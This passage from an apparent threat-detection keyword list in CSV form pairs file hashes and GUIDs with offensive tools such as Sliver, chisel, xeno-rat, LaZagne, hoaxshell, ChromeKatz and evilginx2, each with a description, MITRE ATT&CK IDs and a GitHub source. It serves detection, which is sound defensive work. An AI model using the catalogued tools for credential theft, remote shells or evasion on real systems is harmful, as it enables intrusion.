TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*13A59BB8-0246-4FFA-951B-89B9A341F159*",".{0,1000}13A59BB8\-0246\-4FFA\-951B\-89B9A341F159.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*13ac39c3d0379d55f1fdab74b78354fd7d8c23ce43e0bd2f86c64ec21f2abe63*",".{0,1000}13ac39c3d0379d55f1fdab74b78354fd7d8c23ce43e0bd2f86c64ec21f2abe63.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*13C57810-FF18-4258-ABC9-935040A54F0B*",".{0,1000}13C57810\-FF18\-4258\-ABC9\-935040A54F0B.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*14083A04-DD4B-4E7D-A16E-86947D3D6D74*",".{0,1000}14083A04\-DD4B\-4E7D\-A16E\-86947D3D6D74.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*14268f4b4154d80f6c8a20bd79cca08e829cfef4d5f5c244d968c3652da7a336*",".{0,1000}14268f4b4154d80f6c8a20bd79cca08e829cfef4d5f5c244d968c3652da7a336.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*142d3b96f2c42d4660afb05c725185377a58cf521667ed4efc360171ffcc2e97*",".{0,1000}142d3b96f2c42d4660afb05c725185377a58cf521667ed4efc360171ffcc2e97.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*143ec041216db8df445e02dbb3a71e1603ab495879f073f63857474e32d239b4*",".{0,1000}143ec041216db8df445e02dbb3a71e1603ab495879f073f63857474e32d239b4.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*14551c1d7c781b632e6722cfde0abb62c0698a657bf621ebe6e931a197e81715*",".{0,1000}14551c1d7c781b632e6722cfde0abb62c0698a657bf621ebe6e931a197e81715.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*1464a0e12ee6eacddcc2bc879ad601918412b0d64f3cdceb04c216d6a5485052*",".{0,1000}1464a0e12ee6eacddcc2bc879ad601918412b0d64f3cdceb04c216d6a5485052.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*1487de57ec8a5a8201abe0b868c17ff8cf04bed18a298050edb663a793c0e030*",".{0,1000}1487de57ec8a5a8201abe0b868c17ff8cf04bed18a298050edb663a793c0e030.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*148a719060fcc5ed37c33027cd39e320ca7fdd113500d5ea63128b8c506d86bc*",".{0,1000}148a719060fcc5ed37c33027cd39e320ca7fdd113500d5ea63128b8c506d86bc.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*14a0f72e21730cd71eb2c9cf9a22682ac386aac36cca6a270ef01d9c1bd4561e*",".{0,1000}14a0f72e21730cd71eb2c9cf9a22682ac386aac36cca6a270ef01d9c1bd4561e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*14d0b48fef0484e290504ebd35fcca973fde787ef3db70b70de8b3070b287d46*",".{0,1000}14d0b48fef0484e290504ebd35fcca973fde787ef3db70b70de8b3070b287d46.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*14e2f70470396a18c27debb419a4f4063c2ad5b6976f429d47f55e31066a5e6a*",".{0,1000}14e2f70470396a18c27debb419a4f4063c2ad5b6976f429d47f55e31066a5e6a.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*14e8721290b9457ec4c641c48aaa111df18eeed8e1c208da18666d3f3dd8e2ff*",".{0,1000}14e8721290b9457ec4c641c48aaa111df18eeed8e1c208da18666d3f3dd8e2ff.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "*14ed05af8630a01f953eee94967bf1e6a322819bf404b451038f8aacbde5569b*",".{0,1000}14ed05af8630a01f953eee94967bf1e6a322819bf404b451038f8aacbde5569b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*15079a1ec5eff9da11edafb3c59984d2ab9ce7b02fabfd07cc398ee31e7e1dc8*",".{0,1000}15079a1ec5eff9da11edafb3c59984d2ab9ce7b02fabfd07cc398ee31e7e1dc8.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*15bc39581933d59dcdb7a264d149cf9bec398e04d18ab0b52f596861614c37b3*",".{0,1000}15bc39581933d59dcdb7a264d149cf9bec398e04d18ab0b52f596861614c37b3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*15c8924d9a1c039c2afaf54c431cda1aa0afd3a2dcf67d88d9cafc3ec89cc21b*",".{0,1000}15c8924d9a1c039c2afaf54c431cda1aa0afd3a2dcf67d88d9cafc3ec89cc21b.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*15fc3df52f81c0f09a430e52a2612d1a999284eeb802c8cec48d135fc3b46414*",".{0,1000}15fc3df52f81c0f09a430e52a2612d1a999284eeb802c8cec48d135fc3b46414.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*1617117C-0E94-4E6A-922C-836D616EC1F5*",".{0,1000}1617117C\-0E94\-4E6A\-922C\-836D616EC1F5.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*161fd76c83e557269bee39a57baa2ccbbac679f59d9adff1e1b73b0f4bb277a6*",".{0,1000}161fd76c83e557269bee39a57baa2ccbbac679f59d9adff1e1b73b0f4bb277a6.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*1637c5d66df6ce383aee2ab51e305ae9b654cfb4ceb21cf09d5123a54d7d7b7d*",".{0,1000}1637c5d66df6ce383aee2ab51e305ae9b654cfb4ceb21cf09d5123a54d7d7b7d.{0,1000}","offensive_tool_keyword","SCOMDecrypt","SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers","T1552.001 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/nccgroup/SCOMDecrypt","1","0","N/A","10","2","113","21","2023-11-10T07:04:26Z","2017-02-21T16:15:11Z" "*16461494c864ffe95bb32a01a8db0aa7d46e9db9d6fa0546fdaf75044eb299fa*",".{0,1000}16461494c864ffe95bb32a01a8db0aa7d46e9db9d6fa0546fdaf75044eb299fa.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*1659E645-27B0-4AB9-A10E-64BA4B801CB0*",".{0,1000}1659E645\-27B0\-4AB9\-A10E\-64BA4B801CB0.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*169158f7ab05b90fd880b4921decbbe9ff0b13d04592b4711cdcb07216f2d02a*",".{0,1000}169158f7ab05b90fd880b4921decbbe9ff0b13d04592b4711cdcb07216f2d02a.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*16bef09e16119f1754a6b4283e93ff7a17cfdd7c043c3ff05a3d41f128ead52e*",".{0,1000}16bef09e16119f1754a6b4283e93ff7a17cfdd7c043c3ff05a3d41f128ead52e.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*16e75a6be0f951622988cb5c7875151c9d4638e595a91c43be7a35d4d4f2cd50*",".{0,1000}16e75a6be0f951622988cb5c7875151c9d4638e595a91c43be7a35d4d4f2cd50.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*16e9f3c3f2a4264e3be9d2ddfe8d4ad409f4db17c077efd372389fbfe89f727b*",".{0,1000}16e9f3c3f2a4264e3be9d2ddfe8d4ad409f4db17c077efd372389fbfe89f727b.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","7","7","619","83","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z" "*17179c8931a5dc7a470485097f4a8f35fcf55bc4fa57d34c865ab76cd382ca74*",".{0,1000}17179c8931a5dc7a470485097f4a8f35fcf55bc4fa57d34c865ab76cd382ca74.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*171A9A71-EDEF-4891-9828-44434A00585E*",".{0,1000}171A9A71\-EDEF\-4891\-9828\-44434A00585E.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*17257046150e6cbdc59be7873210cc6e0399ba51a5da24114f3c147bdc4fdb4c*",".{0,1000}17257046150e6cbdc59be7873210cc6e0399ba51a5da24114f3c147bdc4fdb4c.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","0","N/A","9","1","11","0","2024-03-22T10:29:56Z","2024-03-15T15:15:45Z" "*17395a3b51f21d23c817cb84d56e915026fbf18fb34fc74c8b0377cd0e12ef94*",".{0,1000}17395a3b51f21d23c817cb84d56e915026fbf18fb34fc74c8b0377cd0e12ef94.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*173fddaeb3faa3256a8a6606775eb319ef5d70082f3b7c5ffab9d004b66b1c0d*",".{0,1000}173fddaeb3faa3256a8a6606775eb319ef5d70082f3b7c5ffab9d004b66b1c0d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*1753bd59904f52ea9be59524942fc98321472c6a91c7af8051ab397edee32e6a*",".{0,1000}1753bd59904f52ea9be59524942fc98321472c6a91c7af8051ab397edee32e6a.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*176711b9ba9b2e01fbd5ad4ad2770d82985caffc02f70d4aa7585fe44508fbd3*",".{0,1000}176711b9ba9b2e01fbd5ad4ad2770d82985caffc02f70d4aa7585fe44508fbd3.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*17942ccf0a175f0f4d58db7bc010d0c19c18250e1b634f2aba8d91ba6339d829*",".{0,1000}17942ccf0a175f0f4d58db7bc010d0c19c18250e1b634f2aba8d91ba6339d829.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*179c7bc7caed085cdfd1db94e54b75dabb2a8943430be82f590143f2b4303b5d*",".{0,1000}179c7bc7caed085cdfd1db94e54b75dabb2a8943430be82f590143f2b4303b5d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*179fff5afdfa8e25f3027ed01a226cb8f0b6ebee516ea2fb8f4e6e226235fe61*",".{0,1000}179fff5afdfa8e25f3027ed01a226cb8f0b6ebee516ea2fb8f4e6e226235fe61.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*17a1d963e1565ecff5794a685188f34adc40bc12b4f31aa32db53b6956369827*",".{0,1000}17a1d963e1565ecff5794a685188f34adc40bc12b4f31aa32db53b6956369827.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*17a96dd3f358c5b165d40422c6e218c1b3e9d27182e5202b8d0ad611a874c6d8*",".{0,1000}17a96dd3f358c5b165d40422c6e218c1b3e9d27182e5202b8d0ad611a874c6d8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*17d97bd15502bc16353e7e06822578069c1e653b031fb4ac982d8cea9d31026f*",".{0,1000}17d97bd15502bc16353e7e06822578069c1e653b031fb4ac982d8cea9d31026f.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*17ed9f14af38a0b8442ea9306ba6746746a3d18c2a45ff1647603a95bd4425c8*",".{0,1000}17ed9f14af38a0b8442ea9306ba6746746a3d18c2a45ff1647603a95bd4425c8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*181de17b8aa7917df5d9e610cf2b183d92d84ec9fe4b809303842bd47022e49c*",".{0,1000}181de17b8aa7917df5d9e610cf2b183d92d84ec9fe4b809303842bd47022e49c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*1827f84465eaa41ba584561ae108be14e693ba4c992e9d58ef0148959cc9efc1*",".{0,1000}1827f84465eaa41ba584561ae108be14e693ba4c992e9d58ef0148959cc9efc1.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" 